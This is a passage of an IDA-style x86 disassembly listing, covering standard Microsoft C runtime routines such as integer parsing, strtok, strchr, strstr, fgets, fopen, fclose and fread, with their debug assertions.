cmp [ebp+var_14], 0
jz short loc_4195DB
mov eax, [ebp+var_8]
imul eax, 0Ah
mov ecx, [ebp+var_4]
lea edx, [eax+ecx-30h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp short loc_41957F
; ---------------------------------------------------------------------------
loc_4195DB: ; CODE XREF: sub_4194F0+C4�j
cmp [ebp+var_C], 2Dh
jnz short loc_4195E8
mov eax, [ebp+var_8]
neg eax
jmp short loc_4195EB
; ---------------------------------------------------------------------------
loc_4195E8: ; CODE XREF: sub_4194F0+EF�j
mov eax, [ebp+var_8]
loc_4195EB: ; CODE XREF: sub_4194F0+F6�j
mov esp, ebp
pop ebp
retn
sub_4194F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195F0 proc near ; CODE XREF: .text:004036B8�p
; sub_403791+63�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
call sub_4194F0
add esp, 4
pop ebp
retn
sub_4195F0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
loc_419617: ; CODE XREF: .text:0041965F�j
cmp dword_442F58, 1
jle short loc_419637
push 8
mov eax, [ebp+8]
xor ecx, ecx
mov cl, [eax]
push ecx
call sub_41E750
add esp, 8
mov [ebp-14h], eax
jmp short loc_419650
; ---------------------------------------------------------------------------
loc_419637: ; CODE XREF: .text:0041961E�j
mov edx, [ebp+8]
xor eax, eax
mov al, [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8
mov [ebp-14h], edx
loc_419650: ; CODE XREF: .text:00419635�j
cmp dword ptr [ebp-14h], 0
jz short loc_419661
mov eax, [ebp+8]
add eax, 1
mov [ebp+8], eax
jmp short loc_419617
; ---------------------------------------------------------------------------
loc_419661: ; CODE XREF: .text:00419654�j
mov ecx, [ebp+8]
xor edx, edx
mov dl, [ecx]
mov [ebp-4], edx
mov eax, [ebp+8]
add eax, 1
mov [ebp+8], eax
mov ecx, [ebp-4]
mov [ebp-10h], ecx
cmp dword ptr [ebp-4], 2Dh
jz short loc_419686
cmp dword ptr [ebp-4], 2Bh
jnz short loc_419699
loc_419686: ; CODE XREF: .text:0041967E�j
mov edx, [ebp+8]
xor eax, eax
mov al, [edx]
mov [ebp-4], eax
mov ecx, [ebp+8]
add ecx, 1
mov [ebp+8], ecx
loc_419699: ; CODE XREF: .text:00419684�j
mov dword ptr [ebp-0Ch], 0
mov dword ptr [ebp-8], 0
loc_4196A7: ; CODE XREF: .text:00419717�j
cmp dword_442F58, 1
jle short loc_4196C3
push 4
mov edx, [ebp-4]
push edx
call sub_41E750
add esp, 8
mov [ebp-18h], eax
jmp short loc_4196D8
; ---------------------------------------------------------------------------
loc_4196C3: ; CODE XREF: .text:004196AE�j
mov eax, [ebp-4]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp-18h], edx
loc_4196D8: ; CODE XREF: .text:004196C1�j
cmp dword ptr [ebp-18h], 0
jz short loc_419719
push 0
push 0Ah
mov eax, [ebp-8]
push eax
mov ecx, [ebp-0Ch]
push ecx
call sub_41A2F0
mov ecx, eax
mov esi, edx
mov eax, [ebp-4]
sub eax, 30h
cdq
add ecx, eax
adc esi, edx
mov [ebp-0Ch], ecx
mov [ebp-8], esi
mov edx, [ebp+8]
xor eax, eax
mov al, [edx]
mov [ebp-4], eax
mov ecx, [ebp+8]
add ecx, 1
mov [ebp+8], ecx
jmp short loc_4196A7
; ---------------------------------------------------------------------------
loc_419719: ; CODE XREF: .text:004196DC�j
cmp dword ptr [ebp-10h], 2Dh
jnz short loc_41972E
mov eax, [ebp-0Ch]
neg eax
mov edx, [ebp-8]
adc edx, 0
neg edx
jmp short loc_419734
; ---------------------------------------------------------------------------
loc_41972E: ; CODE XREF: .text:0041971D�j
mov eax, [ebp-0Ch]
mov edx, [ebp-8]
loc_419734: ; CODE XREF: .text:0041972C�j
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419740 proc near ; CODE XREF: sub_403FBB+14F�p
; sub_4041AA+64�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], 0FFFFFFFFh
loc_41974E: ; CODE XREF: sub_419740+36�j
cmp [ebp+arg_0], 0
jnz short loc_419772
push offset aStreamNull ; "stream != NULL"
push 0
push 3Ah
push offset aFclose_c ; "fclose.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419772
int 3 ; Trap to Debugger
loc_419772: ; CODE XREF: sub_419740+12�j
; sub_419740+2F�j
xor eax, eax
test eax, eax
jnz short loc_41974E
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 40h
test edx, edx
jz short loc_419791
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 0
jmp short loc_4197B8
; ---------------------------------------------------------------------------
loc_419791: ; CODE XREF: sub_419740+43�j
mov ecx, [ebp+arg_0]
push ecx
call sub_421230
add esp, 4
mov edx, [ebp+arg_0]
push edx
call sub_4197D0
add esp, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_4212A0
add esp, 4
loc_4197B8: ; CODE XREF: sub_419740+4F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_419740 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4197D0 proc near ; CODE XREF: sub_419740+61�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
loc_4197E6: ; CODE XREF: sub_4197D0+3E�j
cmp [ebp+arg_0], 0
jnz short loc_41980A
push offset aStrNull ; "str != NULL"
push 0
push 77h
push offset aFclose_c ; "fclose.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41980A
int 3 ; Trap to Debugger
loc_41980A: ; CODE XREF: sub_4197D0+1A�j
; sub_4197D0+37�j
xor ecx, ecx
test ecx, ecx
jnz short loc_4197E6
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_41987A
mov ecx, [ebp+var_8]
push ecx
call sub_421580
add esp, 4
mov [ebp+var_4], eax
mov edx, [ebp+var_8]
push edx
call sub_421440
add esp, 4
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
push ecx
call sub_421310
add esp, 4
test eax, eax
jge short loc_419856
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_41987A
; ---------------------------------------------------------------------------
loc_419856: ; CODE XREF: sub_4197D0+7B�j
mov edx, [ebp+var_8]
cmp dword ptr [edx+1Ch], 0
jz short loc_41987A
push 2
mov eax, [ebp+var_8]
mov ecx, [eax+1Ch]
push ecx
call sub_4174C0
add esp, 8
mov edx, [ebp+var_8]
mov dword ptr [edx+1Ch], 0
loc_41987A: ; CODE XREF: sub_4197D0+4D�j
; sub_4197D0+84�j ...
mov eax, [ebp+var_8]
mov dword ptr [eax+0Ch], 0
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4197D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419890 proc near ; CODE XREF: sub_403FBB+E4�p
; sub_403FBB+EF�p ...
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_4]
mov [ebp+var_30], eax
call sub_41FA10
mov [ebp+var_8], eax
mov [ebp+var_C], 0
jmp short loc_4198B6
; ---------------------------------------------------------------------------
loc_4198AD: ; CODE XREF: sub_419890+34�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_4198B6: ; CODE XREF: sub_419890+1B�j
cmp [ebp+var_C], 20h
jge short loc_4198C6
mov edx, [ebp+var_C]
mov [ebp+edx+var_2C], 0
jmp short loc_4198AD
; ---------------------------------------------------------------------------
loc_4198C6: ; CODE XREF: sub_419890+2A�j
; sub_419890+79�j
mov eax, [ebp+var_30]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
sar edx, 3
mov eax, [ebp+var_30]
xor ecx, ecx
mov cl, [eax]
and ecx, 7
mov eax, 1
shl eax, cl
mov cl, [ebp+edx+var_2C]
or cl, al
mov edx, [ebp+var_30]
xor eax, eax
mov al, [edx]
sar eax, 3
mov [ebp+eax+var_2C], cl
mov ecx, [ebp+var_30]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+var_30]
add eax, 1
mov [ebp+var_30], eax
test edx, edx
jnz short loc_4198C6
cmp [ebp+arg_0], 0
jz short loc_419919
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
jmp short loc_419922
; ---------------------------------------------------------------------------
loc_419919: ; CODE XREF: sub_419890+7F�j
mov edx, [ebp+var_8]
mov eax, [edx+18h]
mov [ebp+var_4], eax
loc_419922: ; CODE XREF: sub_419890+87�j
; sub_419890+CF�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
sar edx, 3
xor eax, eax
mov al, [ebp+edx+var_2C]
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, edx
and ecx, 7
mov edx, 1
shl edx, cl
and eax, edx
test eax, eax
jz short loc_419961
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_419961
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_419922
; ---------------------------------------------------------------------------
loc_419961: ; CODE XREF: sub_419890+B9�j
; sub_419890+C4�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
jmp short loc_419972
; ---------------------------------------------------------------------------
loc_419969: ; CODE XREF: sub_419890:loc_4199B7�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_419972: ; CODE XREF: sub_419890+D7�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_4199B9
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
sar edx, 3
xor eax, eax
mov al, [ebp+edx+var_2C]
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, edx
and ecx, 7
mov edx, 1
shl edx, cl
and eax, edx
test eax, eax
jz short loc_4199B7
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_4199B9
; ---------------------------------------------------------------------------
loc_4199B7: ; CODE XREF: sub_419890+114�j
jmp short loc_419969
; ---------------------------------------------------------------------------
loc_4199B9: ; CODE XREF: sub_419890+EB�j
; sub_419890+125�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_4]
mov [edx+18h], eax
mov ecx, [ebp+arg_0]
cmp ecx, [ebp+var_4]
jnz short loc_4199CE
xor eax, eax
jmp short loc_4199D1
; ---------------------------------------------------------------------------
loc_4199CE: ; CODE XREF: sub_419890+138�j
mov eax, [ebp+arg_0]
loc_4199D1: ; CODE XREF: sub_419890+13C�j
mov esp, ebp
pop ebp
retn
sub_419890 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_4199F0
loc_4199E0: ; CODE XREF: sub_4199F0+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4199F0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4199F0 proc near ; CODE XREF: sub_403FBB+D0�p
; sub_40A29A+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 004199E0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_4199F6: ; CODE XREF: sub_419AB0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_419A1B
loc_419A08: ; CODE XREF: sub_4199F0+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_4199E0
test cl, cl
jz short loc_419A64
test edx, 3
jnz short loc_419A08
loc_419A1B: ; CODE XREF: sub_4199F0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_419A26: ; CODE XREF: sub_4199F0+61�j
; sub_4199F0+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_419A68
and eax, 81010100h
jz short loc_419A26
and eax, 1010100h
jnz short loc_419A62
and esi, 80000000h
jnz short loc_419A26
loc_419A62: ; CODE XREF: sub_4199F0+68�j
; sub_4199F0+81�j ...
pop esi
pop edi
loc_419A64: ; CODE XREF: sub_4199F0+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_419A68: ; CODE XREF: sub_4199F0+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_419AA5
test al, al
jz short loc_419A62
cmp ah, bl
jz short loc_419A9E
test ah, ah
jz short loc_419A62
shr eax, 10h
cmp al, bl
jz short loc_419A97
test al, al
jz short loc_419A62
cmp ah, bl
jz short loc_419A90
test ah, ah
jz short loc_419A62
jmp short loc_419A26
; ---------------------------------------------------------------------------
loc_419A90: ; CODE XREF: sub_4199F0+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419A97: ; CODE XREF: sub_4199F0+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419A9E: ; CODE XREF: sub_4199F0+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419AA5: ; CODE XREF: sub_4199F0+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_4199F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419AB0 proc near ; CODE XREF: sub_403FBB+C0�p
; sub_405E58+C6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_419B2A
mov dh, [ecx+1]
test dh, dh
jz short loc_419B17
loc_419AC8: ; CODE XREF: sub_419AB0+52�j
; sub_419AB0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_419AEA
test al, al
jz short loc_419AE4
loc_419AD9: ; CODE XREF: sub_419AB0+32�j
mov al, [esi]
inc esi
loc_419ADC: ; CODE XREF: sub_419AB0+3F�j
cmp al, dl
jz short loc_419AEA
test al, al
jnz short loc_419AD9
loc_419AE4: ; CODE XREF: sub_419AB0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_419AEA: ; CODE XREF: sub_419AB0+23�j
; sub_419AB0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_419ADC
lea edi, [esi-1]
loc_419AF4: ; CODE XREF: sub_419AB0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_419B23
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_419AC8
mov al, [ecx+3]
test al, al
jz short loc_419B23
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_419AF4
jmp short loc_419AC8
; ---------------------------------------------------------------------------
loc_419B17: ; CODE XREF: sub_419AB0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_4199F6
; ---------------------------------------------------------------------------
loc_419B23: ; CODE XREF: sub_419AB0+49�j
; sub_419AB0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_419B2A: ; CODE XREF: sub_419AB0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_419AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B30 proc near ; CODE XREF: sub_403FBB+A9�p
; sub_40C50A+4810�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_10], ecx
loc_419B45: ; CODE XREF: sub_419B30+3D�j
cmp [ebp+arg_0], 0
jnz short loc_419B69
push offset aStringNull ; "string != NULL"
push 0
push 3Bh
push offset aFgets_c ; "fgets.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419B69
int 3 ; Trap to Debugger
loc_419B69: ; CODE XREF: sub_419B30+19�j
; sub_419B30+36�j
xor edx, edx
test edx, edx
jnz short loc_419B45
loc_419B6F: ; CODE XREF: sub_419B30+67�j
cmp [ebp+arg_8], 0
jnz short loc_419B93
push offset aStrNull ; "str != NULL"
push 0
push 3Ch
push offset aFgets_c ; "fgets.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419B93
int 3 ; Trap to Debugger
loc_419B93: ; CODE XREF: sub_419B30+43�j
; sub_419B30+60�j
xor eax, eax
test eax, eax
jnz short loc_419B6F
cmp [ebp+arg_4], 0
jg short loc_419BA6
xor eax, eax
jmp loc_419C67
; ---------------------------------------------------------------------------
loc_419BA6: ; CODE XREF: sub_419B30+6D�j
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
call sub_421230
add esp, 4
loc_419BB8: ; CODE XREF: sub_419B30:loc_419C4D�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
cmp [ebp+arg_4], 0
jz loc_419C52
mov ecx, [ebp+var_4]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+var_4]
mov [eax+4], edx
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+4], 0
jl short loc_419C03
mov edx, [ebp+var_4]
mov eax, [edx]
movsx ecx, byte ptr [eax]
and ecx, 0FFh
mov [ebp+var_14], ecx
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
jmp short loc_419C12
; ---------------------------------------------------------------------------
loc_419C03: ; CODE XREF: sub_419B30+B1�j
mov edx, [ebp+var_4]
push edx
call sub_421790
add esp, 4
mov [ebp+var_14], eax
loc_419C12: ; CODE XREF: sub_419B30+D1�j
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_419C31
mov ecx, [ebp+var_8]
cmp ecx, [ebp+arg_0]
jnz short loc_419C2F
mov [ebp+var_10], 0
jmp short loc_419C58
; ---------------------------------------------------------------------------
loc_419C2F: ; CODE XREF: sub_419B30+F4�j
jmp short loc_419C52
; ---------------------------------------------------------------------------
loc_419C31: ; CODE XREF: sub_419B30+EC�j
mov edx, [ebp+var_8]
mov al, byte ptr [ebp+var_C]
mov [edx], al
movsx ecx, byte ptr [ebp+var_C]
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
cmp ecx, 0Ah
jnz short loc_419C4D
jmp short loc_419C52
; ---------------------------------------------------------------------------
loc_419C4D: ; CODE XREF: sub_419B30+119�j
jmp loc_419BB8
; ---------------------------------------------------------------------------
loc_419C52: ; CODE XREF: sub_419B30+95�j
; sub_419B30:loc_419C2F�j ...
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
loc_419C58: ; CODE XREF: sub_419B30+FD�j
mov ecx, [ebp+var_4]
push ecx
call sub_4212A0
add esp, 4
mov eax, [ebp+var_10]
loc_419C67: ; CODE XREF: sub_419B30+71�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_419B30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C70 proc near ; CODE XREF: sub_419D70+D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
loc_419C79: ; CODE XREF: sub_419C70+31�j
cmp [ebp+arg_0], 0
jnz short loc_419C9D
push offset aFileNull ; "file != NULL"
push 0
push 35h
push offset aFopen_c ; "fopen.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419C9D
int 3 ; Trap to Debugger
loc_419C9D: ; CODE XREF: sub_419C70+D�j
; sub_419C70+2A�j
xor eax, eax
test eax, eax
jnz short loc_419C79
loc_419CA3: ; CODE XREF: sub_419C70+5F�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_419CCB
push offset aFile_t0 ; "*file != _T('\\0')"
push 0
push 36h
push offset aFopen_c ; "fopen.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419CCB
int 3 ; Trap to Debugger
loc_419CCB: ; CODE XREF: sub_419C70+3B�j
; sub_419C70+58�j
xor eax, eax
test eax, eax
jnz short loc_419CA3
loc_419CD1: ; CODE XREF: sub_419C70+89�j
cmp [ebp+arg_4], 0
jnz short loc_419CF5
push offset aModeNull ; "mode != NULL"
push 0
push 37h
push offset aFopen_c ; "fopen.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419CF5
int 3 ; Trap to Debugger
loc_419CF5: ; CODE XREF: sub_419C70+65�j
; sub_419C70+82�j
xor ecx, ecx
test ecx, ecx
jnz short loc_419CD1
loc_419CFB: ; CODE XREF: sub_419C70+B7�j
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_419D23
push offset aMode_t0 ; "*mode != _T('\\0')"
push 0
push 38h
push offset aFopen_c ; "fopen.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419D23
int 3 ; Trap to Debugger
loc_419D23: ; CODE XREF: sub_419C70+93�j
; sub_419C70+B0�j
xor ecx, ecx
test ecx, ecx
jnz short loc_419CFB
call sub_421D10
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_419D3B
xor eax, eax
jmp short loc_419D65
; ---------------------------------------------------------------------------
loc_419D3B: ; CODE XREF: sub_419C70+C5�j
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_421980
add esp, 10h
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
push eax
call sub_4212A0
add esp, 4
mov eax, [ebp+var_8]
loc_419D65: ; CODE XREF: sub_419C70+C9�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_419C70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D70 proc near ; CODE XREF: sub_403FBB+90�p
; sub_4041AA+18�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 40h
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_419C70
add esp, 0Ch
pop ebp
retn
sub_419D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D90 proc near ; CODE XREF: sub_4041AA+45�p
; sub_406C9A+4E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_C]
push eax
call sub_421230
add esp, 4
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_419DD0
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+arg_C]
push edx
call sub_4212A0
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_419D90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419DD0 proc near ; CODE XREF: sub_419D90+20�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
imul ecx, [ebp+arg_8]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jnz short loc_419DF9
xor eax, eax
jmp loc_419F9B
; ---------------------------------------------------------------------------
loc_419DF9: ; CODE XREF: sub_419DD0+20�j
mov eax, [ebp+arg_C]
mov ecx, [eax+0Ch]
and ecx, 10Ch
test ecx, ecx
jz short loc_419E14
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_1C], eax
jmp short loc_419E1B
; ---------------------------------------------------------------------------
loc_419E14: ; CODE XREF: sub_419DD0+37�j
mov [ebp+var_1C], 1000h
loc_419E1B: ; CODE XREF: sub_419DD0+42�j
; sub_419DD0:loc_419F93�j
cmp [ebp+var_C], 0
jz loc_419F98
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
and edx, 10Ch
test edx, edx
jz short loc_419EA9
mov eax, [ebp+arg_C]
cmp dword ptr [eax+4], 0
jz short loc_419EA9
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
cmp edx, [ecx+4]
jnb short loc_419E51
mov eax, [ebp+var_C]
mov [ebp+var_20], eax
jmp short loc_419E5A
; ---------------------------------------------------------------------------
loc_419E51: ; CODE XREF: sub_419DD0+77�j
mov ecx, [ebp+arg_C]
mov edx, [ecx+4]
mov [ebp+var_20], edx
loc_419E5A: ; CODE XREF: sub_419DD0+7F�j
mov eax, [ebp+var_20]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_418A00
add esp, 0Ch
mov edx, [ebp+var_C]
sub edx, [ebp+var_18]
mov [ebp+var_C], edx
mov eax, [ebp+arg_C]
mov ecx, [eax+4]
sub ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [eax]
add ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx], ecx
mov eax, [ebp+var_8]
add eax, [ebp+var_18]
mov [ebp+var_8], eax
jmp loc_419F93
; ---------------------------------------------------------------------------
loc_419EA9: ; CODE XREF: sub_419DD0+63�j
; sub_419DD0+6C�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_1C]
jb loc_419F4E
cmp [ebp+var_1C], 0
jz short loc_419ECD
mov eax, [ebp+var_C]
xor edx, edx
div [ebp+var_1C]
mov eax, [ebp+var_C]
sub eax, edx
mov [ebp+var_24], eax
jmp short loc_419ED3
; ---------------------------------------------------------------------------
loc_419ECD: ; CODE XREF: sub_419DD0+E9�j
mov ecx, [ebp+var_C]
mov [ebp+var_24], ecx
loc_419ED3: ; CODE XREF: sub_419DD0+FB�j
mov edx, [ebp+var_24]
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_C]
mov eax, [edx+10h]
push eax
call sub_421E90
add esp, 0Ch
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_419F18
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 10h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp loc_419F9B
; ---------------------------------------------------------------------------
loc_419F18: ; CODE XREF: sub_419DD0+127�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_419F3A
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_419F9B
; ---------------------------------------------------------------------------
loc_419F3A: ; CODE XREF: sub_419DD0+14C�j
mov ecx, [ebp+var_C]
sub ecx, [ebp+var_14]
mov [ebp+var_C], ecx
